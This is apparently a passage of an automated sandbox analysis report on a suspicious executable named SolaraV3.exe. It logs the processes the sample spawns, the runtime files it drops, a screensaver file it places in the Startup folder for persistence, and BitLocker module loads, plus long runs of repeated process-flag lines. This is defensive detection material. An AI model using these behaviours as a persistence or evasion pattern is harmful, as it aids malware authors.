Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Drops PE files

Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Desktop\SolaraV3.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\SolaraV3.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC7076C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

1_2_00007FF6DC7076C0

Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
